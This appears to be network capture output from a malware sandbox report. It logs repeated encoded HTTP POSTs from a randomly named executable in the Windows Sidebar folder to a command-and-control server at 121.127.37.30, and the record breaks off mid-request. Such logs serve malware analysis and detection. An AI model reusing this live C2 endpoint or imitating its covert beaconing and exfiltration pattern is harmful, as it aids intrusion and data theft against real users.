                                                Dec 5, 2024 16:03:35.915584087 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:36.268610954 CET | 1452 | OUT | Data Raw: 55 52 5a 5a 5e 5d 51 5e 5e 5e 51 57 50 5f 5a 50 59 51 58 48 5b 52 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: URZZ^]Q^^^QWP_ZPYQXH[RR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=0 '4>;,\<'*9'X /4*3Z</&>!V?!Y""Z)1
                                                Dec 5, 2024 16:03:37.236725092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:37.468597889 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:37 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 22 3e 31 02 20 29 27 52 2d 2e 38 5a 33 33 2e 09 26 55 30 11 25 3d 21 1c 26 02 24 0a 36 05 2b 17 22 17 34 01 23 06 20 04 24 1d 28 46 0c 1d 21 01 33 06 2e 0c 29 39 3c 57 38 2f 21 0b 3e 0d 26 5b 2d 07 31 0d 29 0a 26 0c 3c 07 04 56 27 2b 33 07 27 3a 2d 03 2b 55 2f 5e 27 25 20 53 00 14 25 19 2a 31 21 11 3d 06 2a 02 21 02 30 1c 3c 05 26 1d 25 5d 29 0c 26 0a 38 01 25 17 23 0e 20 34 23 54 2b 2e 21 04 32 02 2b 04 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y">1 )'R-.8Z33.&U0%=!&$6+"4# $(F!3.)9<W8/!>&[-1)&<V'+3':-+U/^'% S%*1!=*!0<&%])&8%# 4#T+.!2+=#&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                56 | 192.168.2.7 | 49953 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:36.252336979 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:36.596806049 CET | 2564 | OUT | Data Raw: 50 53 5a 5d 5e 5b 51 59 5e 5e 51 57 50 5e 5a 5d 59 57 58 40 5b 55 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZ]^[QY^^QWP^Z]YWX@[UR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?5'/T7$7)<X<4>)?_5/?>(?8'>*/!Y""Z)5
                                                Dec 5, 2024 16:03:37.577081919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:37.812661886 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:37 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                57 | 192.168.2.7 | 49959 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:38.057252884 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:38.409250021 CET | 2564 | OUT | Data Raw: 50 53 5a 58 5e 5e 54 5a 5e 5e 51 57 50 5d 5a 50 59 53 58 42 5b 50 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZX^^TZ^^QWP]ZPYSXB[PR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?6_':48^>+$\<))^!Y$)7Y(;<Y'>5+!Y""Z)
                                                Dec 5, 2024 16:03:39.383625984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:39.618520975 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:39 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                58 | 192.168.2.7 | 49965 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:39.982846022 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:40.331140041 CET | 2564 | OUT | Data Raw: 55 51 5a 5e 5b 5f 54 5f 5e 5e 51 57 50 52 5a 5f 59 50 58 40 5b 53 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZ^[_T_^^QWPRZ_YPX@[SR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9==$/.4$]*]/(/*<!Y;>$<03+!Y""Z)
                                                Dec 5, 2024 16:03:41.304776907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:41.540502071 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:41 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                59 | 192.168.2.7 | 49970 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:41.775845051 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:42.128026009 CET | 2564 | OUT | Data Raw: 50 51 5a 59 5b 5c 54 5b 5e 5e 51 57 50 58 5a 5f 59 5d 58 42 5b 5e 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZY[\T[^^QWPXZ_Y]XB[^R[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)?='<%T4+><+>94 ?$=2((+ ]3.!*?!Y""Z)-


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                60 | 192.168.2.7 | 49971 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:42.594403982 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:42.940788984 CET | 1452 | OUT | Data Raw: 50 52 5f 5e 5e 58 51 5d 5e 5e 51 57 50 5d 5a 59 59 55 58 44 5b 50 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PR_^^XQ]^^QWP]ZYYUXD[PR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y=?>]$?=T (X>+;?*_(!<4(2?++ 0W?!Y""Z)
                                                Dec 5, 2024 16:03:43.916599989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:44.152575016 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 20 5b 2e 5a 37 04 23 1f 2c 2e 38 58 33 30 32 41 27 23 38 10 31 13 2a 08 27 28 33 52 22 3b 27 5a 21 39 0d 59 37 3f 02 04 27 0d 28 46 0c 1d 22 5f 24 16 32 0d 3d 07 02 55 2f 3f 39 40 29 23 25 07 39 00 03 08 29 55 21 57 3c 39 21 0d 32 38 02 1d 24 03 25 03 2b 0d 05 12 27 0f 20 53 00 14 26 0c 3d 31 29 52 2a 2f 3d 11 22 12 30 50 2b 15 39 06 26 28 2a 1d 25 1a 33 5d 25 29 0a 54 20 34 2b 1d 3e 2e 2d 04 27 3f 34 11 29 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y [.Z7#,.8X302A'#81*'(3R";'Z!9Y7?'(F"_$2=U/?9@)#%9)U!W<9!28$%+' S&=1)R*/="0P+9&(*%3]%)T 4+>.-'?4)3&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                61 | 192.168.2.7 | 49972 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:42.741384983 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:43.096882105 CET | 2564 | OUT | Data Raw: 55 52 5a 53 5e 5a 51 5e 5e 5e 51 57 50 52 5a 59 59 53 58 48 5b 5f 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: URZS^ZQ^^^QWPRZYYSXH[_RY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9\)<2^3"4>0_(7*95?/R)W3Z*+$3"<!Y""Z)
                                                Dec 5, 2024 16:03:44.061640024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:44.301774025 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                62 | 192.168.2.7 | 49978 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:44.541467905 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:44.893690109 CET | 2564 | OUT | Data Raw: 55 53 5a 5c 5b 58 51 59 5e 5e 51 57 50 52 5a 5e 59 53 58 40 5b 56 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZ\[XQY^^QWPRZ^YSX@[VRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*?.0-U#'4_*;0<X)<"Y$="3Z<8_&-+!Y""Z)
                                                Dec 5, 2024 16:03:45.868026018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:46.100414038 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:45 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                63 | 192.168.2.7 | 49984 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:46.339222908 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2552
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:46.690880060 CET | 2552 | OUT | Data Raw: 50 56 5a 5b 5e 5f 54 5c 5e 5e 51 57 50 5a 5a 59 59 5d 58 43 5b 56 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZ[^_T\^^QWPZZYY]XC[VR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)/0Y2 4<]*;?+%,Y=0!<'R*1?;/3:+!Y""Z)
                                                Dec 5, 2024 16:03:47.664349079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:47.896100998 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:47 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                64 | 192.168.2.7 | 49986 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:48.135384083 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:48.487426043 CET | 2564 | OUT | Data Raw: 50 5f 5a 52 5e 59 54 5c 5e 5e 51 57 50 5f 5a 5d 59 52 58 48 5b 51 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P_ZR^YT\^^QWP_Z]YRXH[QRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=50<9Q 7^*;??)*'_!/'W*?((''>:?!Y""Z)1


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                65 | 192.168.2.7 | 49991 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:49.280567884 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:49.628051996 CET | 1452 | OUT | Data Raw: 50 53 5a 58 5e 5e 54 5a 5e 5e 51 57 50 59 5a 5f 59 54 58 49 5b 5e 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZX^^TZ^^QWPYZ_YTXI[^R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<2$177*?))( ,;S*1<;$'*/!Y""Z))
                                                Dec 5, 2024 16:03:50.686480999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:50.920602083 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 02 20 03 2d 00 37 2a 09 52 2c 3e 0e 5b 30 30 0c 45 25 55 33 04 26 2d 1b 55 31 15 20 0a 36 2b 0a 02 22 00 30 06 20 01 27 5c 26 27 28 46 0c 1d 21 03 30 01 31 1c 2a 17 2b 0e 2d 3f 25 08 2a 33 0c 59 2d 58 21 09 29 30 2a 0b 3f 17 21 0c 26 01 3c 59 27 14 00 5c 28 33 0a 02 27 25 20 53 00 14 26 0a 2a 1f 3d 1c 2a 3f 04 01 21 5a 2f 09 28 05 2e 1d 24 2b 2e 12 26 1a 38 00 26 17 38 54 22 24 20 0c 3e 00 03 05 26 05 38 10 3d 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: # -7*R,>[00E%U3&-U1 6+"0 '\&'(F!01*+-?%*3Y-X!)0*?!&<Y'\(3'% S&*=*?!Z/(.$+.&8&8T"$ >&8=&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                66 | 192.168.2.7 | 49992 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:49.401921034 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:49.753077030 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:03:50.869203091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:51.108361006 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                67 | 192.168.2.7 | 49998 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:51.357625961 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
